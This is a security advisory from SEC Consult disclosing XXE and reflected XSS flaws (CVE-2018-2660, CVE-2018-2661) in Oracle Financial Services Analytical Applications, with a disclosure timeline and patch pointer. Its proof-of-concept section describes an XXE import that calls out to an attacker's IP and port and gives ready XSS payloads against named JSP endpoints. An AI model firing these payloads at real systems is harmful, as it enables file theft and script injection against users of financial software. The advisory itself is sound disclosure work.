oracle %3call,CVE-2018-2661 CVE-2018-2660 Oracle Financial Services Analytical Applications 7.3.5.x...

SEC Consult Vulnerability Lab Security Advisory < 20180123-0 >

=======================================================================

title: XXE & Reflected XSS

product: Oracle Financial Services Analytical Applications

vulnerable version: 7.3.5.x, 8.0.x

fixed version: Oracle CPU January 2018

CVE number: CVE-2018-2660, CVE-2018-2661

impact: High

homepage: http://www.oracle.com/us/products/applications/

financial-services/analytical-applications/index.html

found: 2017-06-15

by: Mohammad Shah Bin Mohammad Esa, Samandeep Singh

(Office Singapore)

SEC Consult Vulnerability Lab

An integrated part of SEC Consult

Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow

Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com

=======================================================================

Vendor description:

-------------------

"Oracle is the unchallenged leader in Financial Services, with an

integrated, best-in-class, end-to-end solution of intelligent software

and powerful hardware designed to meet every financial service need."

Source: http://www.oracle.com/us/products/applications/

financial-services/analytical-applications/index.html

Business recommendation:

------------------------

By exploiting the XXE vulnerability, an attacker can get read access to the

filesystem of the user's system using the OFSAA web application and thus obtain

sensitive information from the system. It is also possible to bypass input

validation checks in order to inject JavaScript code.

SEC Consult recommends to immediately install the patched version.

Furthermore, a thorough security review should be performed by security

professionals to identify potential further security issues.

Vulnerability overview/description:

-----------------------------------

1) XML eXternal Entity (XXE) Injection (CVE-2018-2660)

The web application allows users to import XML files. An attacker can import a

specially crafted XML file and exploit the XXE vulnerability within the application.

2) Reflected Cross Site Scripting (CVE-2018-2661)

This vulnerability allows an unauthenticated user to inject malicious client

side script which will be executed in the browser of a user if he visits

the manipulated URL.

Proof of concept:

-----------------

1) XML External Entity Injection (XXE) (CVE-2018-2660)

For example, by importing the following XML code in the "Business Model Upload"

function a connection request from the server to the attacker's system will be made.

]>&xxe;

IP:port = IP address and port where the attacker is listening for connections

Furthermore some files can be exfiltrated to remote servers via the

techniques described in:

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf

http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf

2) Reflected Cross Site Scripting (CVE-2018-2661)

The following parameters have been found to be vulnerable to

reflected cross site scripting attacks. Furthermore, there are many more

vulnerable parameters.

The following payload shows a simple alert message box:

URL : http://$DOMAIN/OFSAA/admin/PopupAlert_H5.jsp?winTitle=

METHOD : GET

PAYLOAD :

winTitle=a%3C/title%3E%3Cimg%0A%20src=x%20οnerrοr=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E

URL : http://$DOMAIN/OFSAA/fsapps/common/MM_PageOpener_crossBrowser.jsp?

url=fetchErrorMessages.action&infodom=OCBCOFSAASG&formCode=summarypage&errorMessage={62}~

METHOD : GET

PAYLOAD : errorMessage={62}~%27;alert%0a(0);//&aType=DeleteConfirm

Vulnerable / tested versions:

-----------------------------

The following version has been tested which was the most recent one when

the vulnerabilities were discovered:

* Oracle Financial Services Analytical Applications 8.0.4.0.0

According to Oracle all versions 7.3.5.x and 8.0.x are affected before CPU

January 2018.

Vendor contact timeline:

------------------------

2017-09-11: Contacting vendor through encrypted email (secalert_us@oracle.com)

2017-09-20: Vendor requested to postpone the release date

2018-01-13: Vendor informed that Critical Patch Update that includes fixes

of reported issues will be released on 2018-01-16.

CVE-2018-2660 & CVE-2018-2661 were assigned for the issues

2018-01-23: Public disclosure of advisory

Solution:

---------

Apply patch update in the January 2018 Critical Patch Update:

http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html

Workaround:

-----------

None

Advisory URL:

-------------

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult

Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow

Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab

The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It

ensures the continued knowledge gain of SEC Consult in the field of network

and application security to stay ahead of the attacker. The SEC Consult

Vulnerability Lab supports high-quality penetration testing and the evaluation

of new offensive and defensive technologies for our customers. Hence our

customers obtain the most current information about vulnerabilities and valid

recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Interested to work with the experts of SEC Consult?

Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?

Contact our local offices https://www.sec-consult.com/en/contact/index.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com

Web: https://www.sec-consult.com

Blog: http://blog.sec-consult.com

Twitter: https://twitter.com/sec_consult

EOF M. Shah / @2018